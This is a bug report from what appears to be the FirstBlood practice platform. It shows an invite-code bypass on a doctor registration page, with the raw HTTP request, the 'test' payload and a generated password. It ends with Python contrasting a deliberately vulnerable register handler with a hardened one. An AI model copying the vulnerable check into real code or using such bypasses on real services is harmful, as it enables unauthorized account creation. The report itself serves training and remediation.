FirstBlood-#377 — Unique invite code bypass
This issue was discovered on FirstBlood v2
On 2021-10-25, vigilante Level 4 reported:
Description
It is possible to create a new account with the test/test credentials instead of using a unique invite code.
Steps to reproduce
- Navigate to Services > Doctor login: https://87357338e250-vigilante.a.firstbloodhackers.com/login.php
- Click on the "register here" link: https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
- Use username: test and unique invite code: test, then click on "Secure register".
- You'll get a message that you've successfully created an account.
Success! Your account has been created with the following credentials:
Username: test
Password: Kpu2K8iIta
POST /register.php HTTP/1.1
Host: 87357338e250-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://87357338e250-vigilante.a.firstbloodhackers.com
Referer: https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Connection: close
action=register&username=test&inviteCode=test
Screenshot:
Impact:
It is possible to bypass the unique invite code requirement; it looks like some test credentials made it to production, and the word "test" is accepted as the invite code when creating new accounts.
P3 Medium
Endpoint: /register.php
Parameter: inviteCode=
Payload: test
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted, but when testing FirstBlood v2 the developers accidentally left the test code working.
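As an added illustration (not FirstBlood's code, and the store and function names are assumptions), a minimal model of a register handler: the flawed version that still honours a leftover hardcoded test code, beside a hardened version that only accepts codes issued into a server-side store and marks each one consumed on use.

```python
import hmac
import secrets

# Constructed in-memory invite store: code -> consumed flag. In production this
# would be a database row per code (ideally storing a hash, not the code itself).
INVITES = {}

def issue_invite(store):
    """Mint a fresh random single-use invite code and record it as unused."""
    code = secrets.token_urlsafe(16)
    store[code] = False
    return code

def vulnerable_register(username, invite_code, store):
    """Model of the flawed check: a leftover hardcoded test code still grants an account."""
    if invite_code == "test":            # test value that never got removed
        return {"ok": True, "username": username}
    if invite_code in store:             # also never marks the code as used
        return {"ok": True, "username": username}
    return {"ok": False, "error": "invalid invite code"}

def register(username, invite_code, store):
    """Hardened check: the code must come from the store, be unused, and is consumed on use."""
    matched = None
    for code in store:                   # no early break: timing does not reveal a hit
        if hmac.compare_digest(code.encode(), invite_code.encode()):
            matched = code
    if matched is None or store[matched]:
        return {"ok": False, "error": "invalid or already used invite code"}
    store[matched] = True                # consume first (atomically, in a real DB)
    return {"ok": True, "username": username, "password": secrets.token_urlsafe(12)}
```

The point of the hardened version is that nothing outside the store can ever validate, so a test value left in the code path has nowhere to hide.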